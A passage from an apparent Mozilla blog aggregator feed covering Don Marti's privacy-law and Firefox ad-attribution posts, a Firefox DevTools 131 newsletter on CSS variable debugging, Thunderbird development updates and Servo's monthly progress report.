Kevin is the founder of The Pop-Up, a streetwear business that curates unique pieces from independent brands. While his business is already up and running, he had been working on a new internal line called Digital Produce — a project he’d been passionate about but hadn’t had the time to bring online. Between his full-time job, family, and running the business, creating a website for this new line kept getting delayed. When we sat down to work on it, it felt like the project finally started moving. In just an hour, we built a clean, functional site using Solo that showcases Kevin’s designs, giving his community an easy way to explore his work. For Kevin, the goal was about finally bringing his vision to life after months of putting it off, and giving his brand the platform it deserved. You can check out Digital Produce’s Solo website here.

Building connections, online and beyond

Equipping Jackson, Danielle and Kevin with a powerful, free tool like Solo helped each of them find new ways to tell their stories and engage with their communities. With Solo, they’ve created digital spaces that have the potential to strengthen relationships, raise awareness and share their passions in ways they hadn’t before.

Community has always been at the heart of Mozilla’s products, from the early days of Firefox to the tools we’re creating today. Our goal has always been to empower people to shape the internet in ways that reflect who they are and what matters to them. Solo is one part of that effort, giving small business owners the ability to take charge of their digital presence and build meaningful connections with the people around them.


Ready to start creating?

Launch your website

The post Local roots, digital connections: How Chicago’s small businesses are building with Solo appeared first on The Mozilla Blog.

Don Martithere ought to be a law

Do we really need another CCPA-like state privacy law, or can states mix it up a little in 2025?

What if, instead of big boring laws intended to cover everything, legislators did more of a do the simplest thing that could possibly work approach? Big Tech lobbyists are expensive—maybe a better way to beat them is, instead of grinding out the long-ass PDFs they expect, make them fight an unpredictable distributed campaign of random-ish short bills that take the side of local small businesses?

  • Require generative AI companies to offer an opt out that is not tied to any other services such as search. AI legal links

  • Surveillance companies should need to get state surveillance licenses. Big Tech platforms: mall, newspaper, or something else?, surveillance licensing in practice

  • Require blocking of search ads on state-owned and educational computers, because of the 2022 FBI warning (that’s still up) and the threat of fake ads intended to steal people’s passwords for commonly used services such as Slack and Calendly. B L O C K in the U S A

  • Require Global Privacy Control for smart TVs and appliances, and for smart home platforms that support ordering or subscriptions. GPC all the things!. We also need an opt-out preference signal for NFC tap to pay devices. (AB 3048 in California was a good idea, but it got changed to cover browsers and phones only, so would have tended to drive surveillance to devices where it’s harder to avoid, which would be a terrible experience for users. Thank you for browsing our catalog site, use your compatible smart appliance to actually order anything.) Update 31 Oct 2024: possibly combine the GPC mandate with a reform to wiretapping laws to address the CIPA Uncertainty that a lot of companies have been on about recently. Amend CIPA and similar state wiretapping laws to state that data collection from a device or client software that supports GPC is definitely not wiretapping. That way the companies get the legal ambiguity resolved, the users get their opt-outs, sounds like a solution we can all live with.

  • Some kind of a digital tearsheet requirement to make it harder to trick advertisers into sponsoring illegal activities. notes on a California advertiser protection bill

  • Require clear explanations of consumer categories and inferences. OTHER ATTRIBUTES

  • Postal RtK/RtD/opt outs. If a postal backup is available, that sets the floor for how annoying a company can make the online process. The problem with CCPA RtK workflows

  • Add miscellaneous power user time saving improvements to existing privacy laws. State privacy law features from the power user point of view

  • Pigovian tax on databases of PII (calculated as n * log(n) to disincentivize risky centralization; see the short sketch after this list) taxing surveillance marketing

  • Require platform ad libraries to be crawlable by image indexers like TinEye and by trademark monitoring firms. some ways that Facebook ads are optimized for deceptive advertising

  • Euroclone law: if a company operates in 50 or more countries, and offers a consumer or privacy protection feature to the residents of some jurisdiction outside the USA, then that feature must also be offered to residents of our state. Another easy-ish state law: the No Second-class Citizenship Act

  • Federal: Keep Section 230 immunity for platforms, but pass liability through to the advertisers. Big Tech would have to clean up their act to keep brands.

  • Update existing wiretapping laws to cover modern surveillance in media where no GPC or analogous opt-out is available. In the Kathleen Vita v. New England Baptist Hospital decision, the court wrote, If the Legislature intends for the wiretap act’s criminal and civil penalties to prohibit the tracking of a person’s browsing of, and interaction with, published information on websites, it must say so expressly.
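
As a back-of-the-envelope illustration of the n * log(n) idea in the list above, here is a TypeScript sketch with made-up numbers, purely to show the scaling: the same records held in one centralized database produce a larger taxable base than when split across smaller databases, which is the intended disincentive.

```typescript
// Sketch: why an n * log(n) tax base penalizes centralization.
function taxBase(records: number): number {
  return records * Math.log(records); // the log base does not change the comparison
}

const centralized = taxBase(2_000_000);        // one database holding 2M records
const split = 2 * taxBase(1_000_000);          // the same 2M records in two databases
console.log((centralized / split).toFixed(2)); // ≈ 1.05: centralizing costs ~5% more
```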

Yes, the Big Tech companies will try to get small businesses to come out and advocate for surveillance, but there are a bunch of other small business issues that limitations on surveillance could help address, by shifting the balance of power away from surveillance companies.

  • Are small business owners contending for search rankings and map listings with fake businesses pretending to be competitors in their neighborhood?

  • Is Big Tech placing bogus charges on their advertiser account, or, if they run ads on their own site, are ad companies docking their pay for unexplained “invalid traffic”?

  • Are companies taking their content for “AI” that directly competes with their sites—without letting them opt out, or offering only an opt-out that would make their business unable to use other services?

  • Can a small business even get someone from Big Tech on the phone, or are companies putting their dogmatic programs of union-busting and layoffs ahead of service even to advertisers and good business customers?

  • What happens when an account gets compromised or hacked? Do small businesses have any way to get help (without knowing someone who happens to know someone at the big company)?

Related

privacy economics sources, an easy experiment to support behavioral advertising Lots of claims about the benefits of personalized advertising, not so much evidence.

Calif. Governor vetoes bill requiring opt-out signals for sale of user data

Bonus links

Meta faces data retention limits on its EU ad business after top court ruling

The more sophisticated AI models get, the more likely they are to lie

As the open social web grows, a new nonprofit looks to expand the ‘fediverse’

Google’s GenAI facing privacy risk assessment scrutiny in Europe

The LLM honeymoon phase is about to end

The Department of Transportation’s Underused Privacy Authority

TikTok Inspired Child Suicide Prompts a Sound Reading of Section 230

DOJ Claims Google ‘Destroyed’ Evidence Before Antitrust Trial

The Billionaire Suing Facebook to Remove His Face From AI Scams - WSJ

Don Martilinks for 6 October 2024

Intent IQ Has Patents For Ad Tech’s Most Basic Functions – And It’s Not Afraid To Use Them (Wait a minute. If Firefox is part of the Open Innovation Network’s Linux System definition, and Firefox has ads now, does that mean OIN covers this?) 🍿

New Map Shows Community Broadband Networks Are Exploding In U.S. Community-owned broadband networks provide faster, cheaper, better service than their larger private-sector counterparts. Staffed by locals, they’re also more directly accountable and responsive to the needs of locals

So It Goes GHQ is a board game invented by Kurt Vonnegut in 1956. GHQ is to WWII what chess is to the Medieval battlefield.

The Other Bubble While SaaS is generally a good deal for small-to-mid-sized companies, the inevitable sprawl of letting SaaS into your organization means that you’re stuck with them.

Oskar Wickström: How I Built “The Monospace Web” (fun with CSS, cool vintage style serious-looking design)

Posse: Reclaiming social media in a fragmented world Rather than publishing a post onto someone else’s servers on Twitter or Mastodon or Bluesky or Threads or whichever microblogging service will inevitably come along next, the posts are published locally to a service you control.

Best practices in practice: Black, the Python code formatter I don’t have to explain what they got wrong and why it matters — they don’t even need to understand what happens when the auto-formatter runs. It just cleans things up and we move on with life.

EPIC Publishes Model Privacy Bill as Practical Solution for States (everyone ready for the 2025 privacy bill season next year? There are still some practical problems with this draft—I can see how opting out of every company that might have your data could get to be a big time suck under this. It needs to be simplified to the point where it’s practical IMHO.)

What Happened After I Outed a Reddit Mod for Affiliate Spam (you know that thing where you add reddit to your web search to find honest reviews?)

Valve Steam Deck as a stepping stone to the Linux desktop Thanks to the technology behind Steam Deck, however, you can now play Windows games on Linux without any fuss or muss. (of course, all the growth hacking on Microsoft® brand Windows might help, too)

A layered approach to content blocking Chromium’s Manifest v3 includes the declarativeNetRequest API, which delegates these functions to the browser rather than the extension. Doing so avoids the timing issues visible in privileged extensions and does not require giving the extension access to the page. While these filters are more reliable and improve privilege separation, they are also substantially weaker. You can say goodbye to more advanced anti-adblock circumvention techniques. (Good info on the tradeoffs in Manifest v3, and a possible way forward, with simpler/more secure and complex/more featureful blocking both available to the user)

(If you’re still bored after reading all these, how about trying some effective privacy tips?)

Firefox Developer ExperienceFirefox DevTools Newsletter — 131

Developer Tools help developers write and debug websites on Firefox. This newsletter gives an overview of the work we’ve done as part of the Firefox 131 Nightly release cycle.

Firefox being an open source project, we are grateful to get contributions from people outside of Mozilla.

Want to help? DevTools are written in HTML, CSS and JS so any web developer can contribute! Read how to set up the work environment and check the list of mentored issues.

Supercharging CSS variables debugging

CSS variables, or CSS custom properties if you’re a spec reader, are fantastic for creating easy reusable values through your pages. To make sure they’re as enjoyable to write in your IDE as to debug in the Inspector, all vendors added a way to quickly see the declaration value of a variable when hovering it in the rule view.

DevTools rules view with the following declaration: `height: var(--button-height)`. A tooltip points to the variable and indicates that its value is 20px.

This does work nicely as long as your CSS variable does not depend on other variables. When it does, the declaration value alone might not give you a good indication of what is going on.

DevTools rules view with the following declaration: `height: var(--default-toolbar-height)`. A tooltip points to the variable and indicates that its value is `var(--default-toolbar-height)`. Not really useful: what’s the --default-toolbar-height value?

You’re now left with either going through the different variable declarations to try to map the intermediary values to the final one, or looking in the Layout panel to check the computed value for the variable. This is not super practical and requires multiple steps, and you might already be frustrated because you’ve been chasing a bug for 3 hours now and you just want to go home and relax! That happened to us too many times, so we decided to show the computed value for the variable directly in the tooltip, where it’s easy for you to see (#1626234).

DevTools rules view with the following declaration: `height: var(--default-toolbar-height)`. A tooltip points to the variable and indicates that its value is `var(--default-toolbar-height)`. It also shows a "computed value" section, in which we can read "calc(24px - 2 * 2px)".
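To make this concrete, here is a rough sketch of the kind of chained declarations the tooltip now helps with. The variable names are made up to loosely mirror the screenshots above; only the calc() result matches the post.

```
:root {
  /* hypothetical base value, not taken from the post */
  --toolbar-padding: 2px;
  --default-toolbar-height: calc(24px - 2 * var(--toolbar-padding));
}

.toolbar {
  /* Hovering --default-toolbar-height here used to show only the raw
     var()/calc() declaration; the tooltip now also shows the computed
     value, i.e. calc(24px - 2 * 2px). */
  height: var(--default-toolbar-height);
}
```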


This is even more helpful when you’re using registered custom properties, as the value expression can be properly, well, computed by the CSS engine, giving you the final value.

The same declaration as previously, but the tooltip "computed value" section now indicates "20px". There's also a "@property" section with the following:  ```   syntax: '<length>';   inherits: true;   initial-value: 10px; ```
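For reference, a registered custom property like the one shown in the screenshot would be declared with an @property rule along these lines. The descriptor values are taken from the screenshot; the property name is an assumption.

```
/* Registering the property gives the CSS engine a typed syntax and an
   initial value, so var() expressions that use it can be fully computed,
   which is why the tooltip can show the final 20px above. */
@property --default-toolbar-height {
  syntax: '<length>';
  inherits: true;
  initial-value: 10px;
}
```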


Since we were already upgrading the variable tooltip, we decided to make it look good too, parsing the values the way we already do in the rules view, showing color previews, striking through unused var() and light-dark() parameters, and more (#1912006)!


The variable tooltip with the following value: `var(--border-size, 1px) solid light-dark(hotpink, brown)`. The 1px in `var` and `brown` in `light-dark` are struck through, indicating they're not used. The computed value section indicates that the value is `2px solid light-dark(hotpink, brown)`.

What’s great with this change is that now that we have the computed value at hand, it’s easy to add a color swatch next to variables relying on other variables, which we weren’t doing before (#1630950).

The following rules:  ``` .btn-primary {   color: var(--button-color); } :root {   --button-color: light-dark(var(--primary), var(--base));   --primary: gold;   --base: tomato; } ```  before `var(--button-color)`, we can see a gold color swatch, since the page is in light theme.

Even better, this allows us to show the computed value of the variable in the autocomplete popup (#1911524)!

A value is being added for the color property. The input has the `var(--` text in it, and an autocomplete popup is displayed with 3 items: - `--base tomato` - `--button-color rgb(255, 215, 0)` - `--primary gold`

While doing this work and reading the spec, I learnt that you can declare empty CSS variables which are valid.

(…) writing an empty value into a custom property, like --foo: ;, is a valid (empty) value, not the guaranteed-invalid value.

https://www.w3.org/TR/css-variables-1/#guaranteed-invalid
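Here is a small illustration of that distinction, with made-up property names: a declared-but-empty custom property is a valid value, while an undeclared one falls back to the guaranteed-invalid value.

```
.demo {
  /* Declared but empty: a valid (empty) value, per the spec quote above. */
  --empty: ;
  /* var(--empty) substitutes to nothing, so this resolves to `margin: 10px`. */
  margin: var(--empty) 10px;

  /* --missing was never declared, so var(--missing) is the guaranteed-invalid
     value and the `red` fallback is used instead. */
  color: var(--missing, red);
}
```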

It wasn’t possible to add an empty CSS variable from the Rules view, so we fixed this (#1912263). And then, for such empty values, we show an `<empty>` string so you’re not left with an empty space, wondering if there’s a bug in DevTools (#1912267, #1912268).

The following rule is displayed in the rules view:  ``` .btn-primary {   --foo: ;   color: var(--foo); } ```  A tooltip points to `--foo`, and has the following text: `<empty>`. The computed panel is also visible, showing `--foo`, whose value is also `<empty>`.

Enhanced Markup and CSS editing

One of my favorite features in DevTools is the ability to increase or decrease values in the Rules view using the up and down arrows on the keyboard. In Firefox 131 you can now use the mouse wheel to do the same thing, and like with the keyboard, holding Shift will make the increment bigger, and holding Alt (Option on OSX) will make the increment smaller (#1801545). Thanks a lot to Christian Sonne, who started this work!

Editing attributes in the markup view was far from ideal, as the difference between an element attribute being focused and the initial state of attribute inputs was almost invisible, even to me. This wasn’t great, especially with all our work on focus indicators, which aims to bring clarity to users, so we improved the situation by changing the style of the selected node when an attribute is being modified, which should help make editing less confusing (#1501959, #1907803, #1912209).

Firefox 130 on the left, and Firefox 131 on the right. On the top, the class attribute being focused with the keyboard; on the bottom, the class attribute being edited via an input, with its content selected. On the left, there’s almost no visible difference between the two states.

Bug fixes


In Firefox 127, we made some changes to improve performance of the markup view, including how we detect if we should show the event badge on a given element. Unfortunately we also completely broke the event badge if the page was using jQuery and the Array prototype was extended, for example by including Moo.js. This is fixed in Firefox 131 and in ESR 128 as well (#1916881).

We got a report that enabling the grid highlighter in some specific conditions would stress the GPU and CPU, because we were triggering too many reflows while working around a platform limitation to avoid rendering issues. That limitation is now gone, so we can save cycles and avoid frying your GPU (#1909170).

Finally, we made selecting a <video> element using the node picker not play/pause said video (#1913263).

And that’s it for this month, folks. Thank you for reading this and using our tools, see you in a few weeks for a new round of updates 🙂


Full list of fixed bugs in DevTools for the Firefox 131 release:

Mozilla ThunderbirdThunderbird Monthly Development Digest: September 2024

Hello Thunderbird Community! I’m Toby Pilling, a new team member. I’ve spent the last couple of months getting up to speed and have really enjoyed meeting the team and members of the community, virtually and some in person! September is now over (and so is the summer for many in our team), and we’re excited to share the latest adventures underway in the Thunderbird world. If you missed our previous update, go ahead and catch up! Here’s a quick summary of what’s been happening across the different teams:

Exchange

Progress continues on implementing move/copy operations, with the ongoing re-architecture aimed at making the protocol ecosystem more generic. Work has also started on error handling, protocol logging and a testing framework. A Rust starter pack has been provided to facilitate onboarding of new team members, with automated type generation as the first step in reducing friction.

Account Hub

Development of a refreshed account hub is moving forward, with design work complete and a critical path broken down into sprints. Project milestones and tasks have been established with additional members joining the development team in October. Meta bug & progress tracking.

Global Database & Conversation View

The team is focused on breaking down the work into smaller tasks and setting feature deliverables. Initial work on integrating a unique IMAP ID is being rolled out, while the conversation view feature is being fast-tracked by a focused team, allowing core refactoring to continue in parallel.

In-App Notification

This initiative will provide a mechanism to notify users of important security updates and feature releases “in-app”, in a subtle and unobtrusive manner, and has advanced at breakneck speed with impressive collaboration across each discipline. Despite some last-minute scope creep, the team has moved swiftly into the testing phase with an October release in mind. Meta Bug & progress tracking.

Source Docs Clean-up

Work continues on source documentation clean-up, with support from the release management team who had to reshape some of our documentation toolset. The completion of this project will move much of the developer documentation closer to the actual code which will make things much easier to maintain moving forwards. Stay tuned for updates to this in the coming week and follow progress here.

Account Cross-Device Import

As the launch date for Thunderbird for Android gets closer, we’re preparing a feature in the desktop client which will provide a simple and secure account transfer mechanism, so that account settings don’t have to be re-entered for new users of the Android client. A functional prototype was delivered quickly. Now that design work is complete, the project entered the final two sprints this week. Keep track here.

Battling OAuth Changes

As both Microsoft and Google update their OAuth support and URLs, the team has been working hard to minimize the effect of these changes on our users. Extended logging in Daily will allow for better monitoring and issue resolution as these updates roll out.

New Features Landing Soon

Several requested features are expected to debut this month or very soon.

As usual, if you want to see things as they land you can check the pushlog and try running daily. This would be immensely helpful for catching bugs early.

See ya next month.

Toby Pilling
Sr. Manager, Desktop Engineering

The post Thunderbird Monthly Development Digest: September 2024 appeared first on The Thunderbird Blog.

The Servo BlogThis month in Servo: Android nightlies, right-to-left, WebGPU, and more!

Servo nightly showing new support for <ul type>, right-to-left layout, ‘table-layout: fixed’, ‘object-fit’, ‘object-position’, crypto.getRandomValues(BigInt64Array) and (BigUint64Array), and innerText and outerText

Servo has had several new features land in our nightly builds over the last month:

Servo’s flexbox support continues to mature, with support for ‘align-self: normal’ (@Loirooriol, #33314), plus corrections to cross-axis percent units in descendants (@Loirooriol, @mrobinson, #33242), automatic minimum sizes (@Loirooriol, @mrobinson, #33248, #33256), replaced flex items (@Loirooriol, @mrobinson, #33263), baseline alignment (@mrobinson, @Loirooriol, #33347), and absolute descendants (@mrobinson, @Loirooriol, #33346).

Our table layout has improved, with support for width and height presentational attributes (@Loirooriol, @mrobinson, #33405, #33425), as well as better handling of ‘border-collapse’ (@Loirooriol, #33452) and extra <col> and <colgroup> columns (@Loirooriol, #33451).

We’ve also started working on the intrinsic sizing keywords ‘min-content’, ‘max-content’, ‘fit-content’, and ‘stretch’ (@Loirooriol, @mrobinson, #33492). Before we can support them, though, we needed to land patches to calculate intrinsic sizes, including for percent units (@Loirooriol, @mrobinson, #33204), aspect ratios of replaced elements (@Loirooriol, #33240), column flex containers (@Loirooriol, #33299), and ‘white-space’ (@Loirooriol, #33343).

We’ve also worked on our WebGPU support, with support for pipeline-overridable constants (@sagudev, #33291), and major rework to GPUBuffer (@sagudev, #33154) and our canvas presentation (@sagudev, #33387). As a result, GPUCanvasContext now properly supports (re)configuration and resize on GPUCanvasContext (@sagudev, #33521), presentation is now faster, and both are now more conformant with the spec.

Performance and reliability

Servo now sends font data over shared memory (@mrobinson, @mukilan, #33530), saving a huge amount of time compared with sending font data over IPC channels.

We now debounce resize events for faster window resizing (@simonwuelker, #33297), limit document title updates (@simonwuelker, #33287), and use DirectWrite kerning info for faster text shaping on Windows (@crbrz, #33123).

Servo has a new kind of experimental profiling support that can send profiling data to Perfetto (on all platforms) and HiTrace (on OpenHarmony) via tracing (@atbrakhi, @delan, #33188, #33301, #33324), and we’ve instrumented Servo with this in several places (@atbrakhi, @delan, #33189, #33417, #33436). This is in addition to Servo’s existing HTML-trace-based profiling support.

We’ve also added a new profiling Cargo profile that builds Servo with the recommended settings for profiling (@delan, #33432). For more details on building Servo for profiling, benchmarking, and other perf-related use cases, check out our updated Building Servo chapter (@delan, book#22).

Build times

The first patch towards splitting up our massive script crate has landed (@sagudev, #33169), over ten years since that issue was first opened.

script is the heart of the Servo rendering engine — it contains the HTML event loop plus all of our DOM APIs and their bindings to SpiderMonkey, and the script thread drives the page lifecycle from parsing to style to layout. script is also a monolith, with over 170 000 lines of hand-written Rust plus another 520 000 lines of generated Rust, and it has long dominated Servo’s build times to the point of being unwieldy, so it’s very exciting to see that we may be able to change this.

Contributors to Servo can now enjoy faster self-hosted CI runners for our Linux builds (@delan, @mrobinson, #33321, #33389), cutting a typical Linux-only build from over half an hour to under 8 minutes, and a typical T-full try job from over an hour to under 42 minutes.

We’ve now started exploring self-hosted macOS runners (@delan, ci-runners#3), and in the meantime we’ve landed several fixes for self-hosted build failures (@delan, @sagudev, #33283, #33308, #33315, #33373, #33471, #33596).

servoshell on desktop with improved tabbed browsing UI
servoshell on Android with new navigation UI

Beyond the engine

You can now download the Servo browser for Android on servo.org (@mukilan, #33435)! servoshell now supports gamepads by default (@msub2, #33466), builds for OpenHarmony (@mukilan, #33295), and has better navigation on Android (@msub2, #33294).

Tabbed browsing on desktop platforms has become a lot more polished, with visible close and new tab buttons (@Melchizedek6809, #33244), key bindings for switching tabs (@Melchizedek6809, #33319), as well as better handling of empty tab titles (@Melchizedek6809, @mrobinson, #33354, #33391) and the location bar (@webbeef, #33316).

We’ve also fixed several HiDPI bugs in servoshell (@mukilan, #33529), as well as keyboard input and scrolling on Windows (@crbrz, @jdm, #33225, #33252).

Donations

Thanks again for your generous support! We are now receiving 4147 USD/month (+34.7% over July) in recurring donations. This includes donations from 12 people on LFX, but we will stop accepting donations there soon — please move your recurring donations to GitHub or Open Collective.

Servo is also on thanks.dev, and already eleven GitHub users that depend on Servo are sponsoring us there. If you use Servo libraries like url, html5ever, selectors, or cssparser, signing up for thanks.dev could be a good way for you (or your employer) to give back to the community.


With this money, we’ve been able to pay for our web hosting and self-hosted CI runners for Windows and Linux builds, and when the time comes, we’ll be able to afford macOS runners, perf bots, and maybe even an Outreachy intern or two! As always, use of these funds will be decided transparently in the Technical Steering Committee. For more details, head to our Sponsorship page.

Don Martiwhy I’m turning off Firefox ad tracking: the PPA paradox

Previously: turn off advertising features in Firefox

I am turning off the controversial Privacy-preserving attribution (PPA) advertising tracking feature in Firefox, even though, according to the documentation, there are some good things about PPA compared to cookies:

  • You can’t be identified individually as the same person who saw an ad and then bought something

  • A site can’t tell if you have PPA on or off

Those are both interesting and desirable properties, and the PPA system, if implemented correctly and run honestly, does not look like a problem on its own. So why are people creeped out by it? That creeped-out feeling is not coming from privacy math ignorance, it’s people’s inner behavioral economists warning about an information imbalance. Just like people who grow up playing ball can catch a ball without consciously doing calculus, people who grow up in market economies get a pretty good sense of markets and information, which manifests as a sense of being creeped out when something about a market design doesn’t seem right.

The problem is not the design of PPA on its own, it’s that PPA is being proposed as something to run on the real Web, a place where you can find both the best legit ad-supported content and the most complicated scams. And that creates a PPA paradox: this privacy-preserving attribution feature, if it catches on, will tend to increase the amount of surveillance. PPA doesn’t have all of the problems of privacy-enhancing technologies in web browsers, but this is a big one.

Briefly, the way that PPA is designed to work is that sites that run ads will run JavaScript to request that the browser store impression events to keep a record of the ad you saw, and then a site where you buy stuff can record a conversion and then get a report to find out which sites the people who bought stuff had seen ads on. The browser doesn’t directly share the impression events with the site where you buy stuff. It generates an encrypted message that might or might not include impressions, then the site passes those encrypted messages to secure services to do math on them and create an aggregated report. The report doesn’t make it possible to match any individual ad impression to any individual sale.

So, as a web entrepreneur willing to bend the rules, how would you win PPA? You could make a site where people pay attention to the ads, and hope that gets them to buy stuff, so you get more ad money that way. The problem with that is that legit ad-supported content and legit, effective advertising are both hard. Not only do you need to make a good site, the advertisers who run their ads on it need to make effective ads in order for you to win this way. An easier way to win the PPA game is to run a crappy site and then (1) figure out who’s about to buy, (2) trick those people into visiting your crappy site, and (3) tell the browser to store an impression before the sale you predicted, so that your crappy site gets credit for making the sale. And steps 1 and 2 work better and better the more surveillance you can do, including tracking people between web and non-web activity, smart TV mics, native mobile SDKs, server-to-server CAPIs, malware, use your imagination.

(Update 14 Oct 2024) PPA has an antitrust problem, too. In a market where the average user has their activity passed to Meta by thousands of companies, Meta has a large advantage when training a machine learning system to steal conversions by placing an ad in front of someone who would be likely to buy anyway. With PPA, a large surveillance company would not have to deliberately tell anyone to do fraud, or write code to do fraud. Instead, ML systems designed to win PPA would learn to do fraud, since if you have the surveillance data anyway, fraud is the quickest, easiest way to get money. (Like I said, legit conversions are hard.) And unlike what happened in legacy fraud cases like Uber v. Fetch, with PPA enough data is deliberately obfuscated to make the fraud impossible to track down. Only a few large companies have the combination of ML and large inflows of user data to make this kind of invisible, deniable fraud possible, so PPA looks like a tool for problematic concentration in the Internet and advertising businesses.

Of course, attribution stealing schemes are a thing with conventional cookie and mobile app tracking, too. And they have been for quite a while. But conventional tracking generally produces enough extra info to make it possible to do more interesting attribution systems that enable marketers to figure out when legit and not-so-legit conversions are happening. If you read Mobile Dev Memo by Eric Seufert and other high-end marketing sites, there is a lot of material about more sophisticated attribution models than what’s possible with PPA. Marketers have a constant set of stats problems to solve to figure out which of the ads are going to influence people in the direction of buying stuff, and which ad money is being wasted because it gets spent on claiming credit for selling a thing that customers were going to buy anyway. PPA doesn’t provide the info needed to get good answers for those stats problems—so what works like a privacy feature on its own would drive the development and deployment of more privacy risks. I’m turning it off, and I hope that enough people will join me to keep PPA from catching on.

More: or we could just not

Related

Campaigners claim ‘Privacy Preserving Attribution’ in Firefox does the opposite (more coverage of the EU complaint)

PET projects or real privacy?

Move at the speed of trust

Google’s revised ad targeting plan triggers fresh competition concerns in UK

Protecting Your Privacy While Eroding Your Democracy: Apple’s and Mozilla’s PPAs (Privacy Preserving Ad Attribution) Considered Harmful by Asif Youssuff Unfortunately, after studying each proposal, I predict they will inadvertently lend themselves to further incentivize the publication and spread of low-quality information (including misinformation), polluting the information landscape and threatening democracies worldwide.

the colored pencil test for web features A web browser is the agent of the user, and should act in the user’s interest, which means doing what the user would do for themselves if they had time.

Mozilla ThunderbirdState Of The Bird: Thunderbird Annual Report 2023-2024

We’ve just released Thunderbird version 128, codenamed “Nebula”, our yearly stable release. So with that big milestone done, I wanted to take a moment and tell our community about the state of Thunderbird. In the past I’ve done a recap focused solely on the project’s financials, which is interesting – but doesn’t capture all of the great work that the project has accomplished. So, this time, I’m going to try something different. I give you the State of the Bird: Thunderbird Annual Report 2023-2024.

Before we jump into it, on behalf of the Thunderbird Team and Council, I wanted to extend our deepest gratitude to the hundreds of thousands of people who generously provided financial support to Thunderbird this past year. Additionally, Thunderbird would like to thank the many volunteers who contributed their time to our many efforts. It is not an exaggeration to say that this product would not exist without them. All of our contributors are the lifeblood of Thunderbird. They are the beacons shining brightly to remind us of the transformative power of open source, and the influence of the community that stands alongside it. Thank you for not just being on this journey with us, but for making the journey possible.


Supernova & Nebula

Thunderbird Supernova 115 blazed into existence on July 11, 2023. This Extended Support Release (ESR) not only introduced cool code names for releases, but also helped bring Thunderbird a modern look and experience that matched the expectation of users in 2023. In addition to shedding our outdated image, we also started tackling something which prevented a brisk development pace and steady introduction of new features: two decades of technical debt.

After three years of slow decline in Daily Active Users (DAUs), the Supernova release started a noticeable upward trend, which reaffirms that the changes we made in this release are putting us on the right track. What our users were responding to wasn’t just visual, however. As we’ve noted many times before – Supernova was also a very large architectural overhaul that saw the cleanup of decades of technical debt for the mail front-end. Supernova delivered a revamped, customizable mail experience that also gave us a solid foundation to build the future on.

Fast forwarding to Nebula, released on July 11, 2024, we built upon many of the pillars that made Supernova a success. We improved the look and feel, usability, customization and speed of the mail experience in truly substantial ways. Additionally, many of the investments in improving the Thunderbird codebase began to pay dividends, allowing us to roll in preliminary Exchange support and use native OS notifications.

All of the work that has happened with Supernova and Nebula is an effort to make Thunderbird a first-class email and productivity tool in its own right. We’ve spent years paying down technical debt so that we could focus more on the features and improvements that bring value to our users. This past year we got to leverage all that hard work to create a truly great Thunderbird experience.

K-9 Mail & Thunderbird For Android

In response to the enormous demand for Thunderbird on a phone, we’ve worked hard to lay a solid foundation for our Android release. The effort to turn K-9 Mail into something we can confidently call a great Thunderbird experience on-the-go is coming along nicely.

In April of 2023, we released K-9 6.600 with a message view redesign that brought K-9 and Thunderbird more in line. This release also had a more polished UI, among other fixes, improvements, and changes. Additionally, it integrated our new design system with reusable components that will allow quicker responses to future design changes in Android.

The 6.7xx Beta series, developed throughout 2023, primarily focused on improving account setup. The main reason for this change is to enable seamless email account setup. This also started the transition of K-9’s UI from traditional Android XML layouts to using the more modern and now recommended Jetpack Compose UI toolkit, and the adoption of Atomic Design principles for a cohesive, intuitive design. The 6.710 Beta release in August was the first to include the new account setup for more widespread testing. Introducing new account setup code and removing some of the old code was a step in the right direction.

In other significant events of 2023, we hired Wolf Montwé as a senior software engineer, doubling the K-9 Mail team at MZLA! We also conducted a security audit with 7ASecurity and OSTIF. No critical issues were found, and many non-critical issues were fixed. We began experimenting with Material 3 and based on positive results, decided to switch to Material 3 before renaming the app. Encouraged by our community contributors, we moved to Weblate for localization. Weblate is better integrated into K-9 and is open source. Some of our time was also spent on necessary maintenance to ensure the app works properly on the latest Android versions.

So far this year, we’ve shipped the account setup improvements to everyone and continued work on Material 3 and polishing the app in preparation for its transition to “Thunderbird for Android.” You can look at individual release details in our GitHub repository and track the progress we’ve made there. Suffice to say, the work on creating an amazing Android experience has been significant – and we look forward to sharing the first true Thunderbird release on Android in the next few months.

Services and Infrastructure

In 2023 we began working in earnest on delivering additional value to Thunderbird users through a suite of web services. The reasoning? There are some features that would add significant value to our users that we simply can’t do in the Thunderbird clients alone. We can, however, create amazing, open source, privacy-respecting services that enhance the Thunderbird experience while aligning with our values – and that’s what we’ve been doing.

The services that we’ve focused on are: Appointment, a calendar scheduling tool; Send, an encrypted large-file transfer service; and Thunderbird Sync, which will allow users to sync their Thunderbird settings between devices (both desktop and Android).

Thunderbird Appointment enables you to plan less and do more. You can add your calendars to the service, outline your weekly availability and then send links that allow others to grab time on your schedule. No more long back-and-forth email threads to find a time to meet, just send a link. We’ve just opened up beta testing for the service and look forward to hearing from early users about which features they’d like to see. For more information on Thunderbird Appointment, and if you’d like to sign up to be a beta tester, check out our Thunderbird Appointment blog post. If you want to look at the code, check out the repository for the project on GitHub.

The Thunderbird team was very sad when Firefox Send was shut down. Firefox Send made it possible to send large files easily, maybe easier than any other tool on the Internet. So we’re reviving it, but not without some nice improvements. Thunderbird Send will not only allow you to send large files easily, but our version also encrypts them. All files that go through Send are encrypted, so even we can’t see what you share on the service. This privacy focus was important in building this tool because it’s one of our core values, spelled out in the Mozilla Manifesto (principle 4): “Individuals’ security and privacy on the internet are fundamental and must not be treated as optional.”

Finally, after many requests for this feature, I’m happy to share that we are working hard to make Thunderbird Sync available to everyone. Thunderbird Sync will allow you to sync your account and application settings between Thunderbird clients, saving time at setup and headaches when you use Thunderbird on multiple devices. We look forward to sharing more on this front in the near future.

2023 Financial Picture

All of the above work was made possible because of our passionate community of Thunderbird users. 2023 was a year of significant investment into our team and our infrastructure, designed to ensure the continued long-term stability and sustainability of Thunderbird. As previously mentioned these investments would not have been possible without the remarkable generosity of our financial contributors.

Contribution Revenue

Total financial contributions in 2023 reached $8.6M, reflecting a 34.5% increase over 2022. More than 515,000 transactions from over 300,000 individual contributors generated this financial support (26% of the transactions were recurring monthly contributions).

In addition to that incredible total, what stands out is that the majority of our contributions were modest. The average contribution amount was $16.90, and the median amount was $11.12.

We are often asked if we have “super givers” and the refreshing answer is “no, we simply have a super community.” To underscore this, consider that 61% of giving was $20 or less, and 95% of the transactions were $35 or less. Transactions of $1,000 and above numbered only 56; that’s roughly 0.01% of all contribution transactions.

